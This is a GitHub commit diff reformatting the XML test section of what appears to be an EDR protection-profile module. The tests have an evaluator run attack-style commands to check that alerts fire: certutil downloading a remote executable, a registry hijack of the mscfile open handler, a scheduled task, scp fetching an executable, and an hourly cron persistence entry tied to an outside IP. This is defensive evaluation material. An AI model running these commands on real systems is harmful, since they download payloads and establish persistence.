Skip to content

Commit aa037fc

Browse files
authored
Update esm-edr.xml
1 parent 390bca2 commit aa037fc

File tree

1 file changed

+6
-6
lines changed

1 file changed

+6
-6
lines changed

input/esm-edr.xml

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -408,9 +408,10 @@ This section describes any modifications that the ST author must make to the Bas
408408
<h:p/>
409409
</Guidance>
410410
<Tests>
411-
<h:p>The evaluator shall perform the following tests:</h:p>
411+
The evaluator shall perform the following tests:
412412
<testlist>
413-
<h:p><h:b>For Windows,</h:b> the evaluator shall test the EDR's ability to detect anomalous activity by performing the following subtests based on the platform of the enrolled Host Agent's system, verifying for each that, corresponding alerts were generated in the management dashboard:</h:p>
413+
<h:b>For Windows,</h:b>
414+
the evaluator shall test the EDR's ability to detect anomalous activity by performing the following subtests based on the platform of the enrolled Host Agent's system, verifying for each that, corresponding alerts were generated in the management dashboard:
414415
<test>The evaluator shall open a Windows command prompt as a user and run the command <h:code>cmd /c certutil -urlcache -split -f &lt;remote file>
415416
&lt;download directory></h:code>, where the remote file is a valid file path to an accessible, remotely stored executable, and the download directory is a valid directory path writable by the current local user.</test>
416417
<test>The evaluator shall open a Windows command prompt as a user and run the command <h:code>reg.exe add hkcu\software\classes\mscfile\shell\open\command
@@ -419,7 +420,8 @@ This section describes any modifications that the ST author must make to the Bas
419420
executable>" /ST &lt;time></h:code>, where the local executable is a valid file path to a readable, local executable, and time is a start time that occurs within minutes of the task being created.</test>
420421
</testlist>
421422
<testlist>
422-
<h:p><h:b>For Linux,</h:b> the evaluator shall test the EDR's ability to detect anomalous activity by performing the following subtests based on the platform of the enrolled Host Agent's system, verifying for each that, corresponding alerts were generated in the management dashboard:</h:p>
423+
<h:b>For Linux,</h:b>
424+
the evaluator shall test the EDR's ability to detect anomalous activity by performing the following subtests based on the platform of the enrolled Host Agent's system, verifying for each that, corresponding alerts were generated in the management dashboard:
423425
<test>The evaluator shall open a terminal and run the command <h:code>scp
424426
&lt;remote user>@&lt;remote host>:&lt;remote path>
425427
&lt;download directory></h:code>, where the remote user is a valid user on remote host, remote path is a valid path to a remotely stored executable, and the download directory is a valid directory path writable by the current local user. The remote user's password shall be provided when prompted.</test>
@@ -428,9 +430,7 @@ This section describes any modifications that the ST author must make to the Bas
428430
/etc/cron.hourly/persist</h:code>, where the outside IP is a valid external address.</test>
429431
</testlist>
430432
<testlist>
431-
<h:p>
432-
<h:b>For all platforms:</h:b>
433-
</h:p>
433+
<h:b>For all platforms:</h:b>
434434
<test>The evaluator shall review an alert on the management dashboard and verify that the alert contains a severity field and the fields specified in the ST. The evaluator will open or view the alert and verify that a timeline of events is available for review. The timeline shall show a progression of events over time.</test>
435435
<test>The evaluator shall pick an alert on the management dashboard and export the alert in every format specified in the ST. The evaluator shall review the operational guidance and the selection from the requirement and verify that export options exist for all the declared formats in the selection. After exporting one alert for each possible format the evaluator shall review the file contents of the exported alert and verify it is the correct format for the selected export option (for example, an export of the IODEF type must contain 'IODEF-Document' in the first element of the exported file).</test>
436436
</testlist>

0 commit comments

Comments
 (0)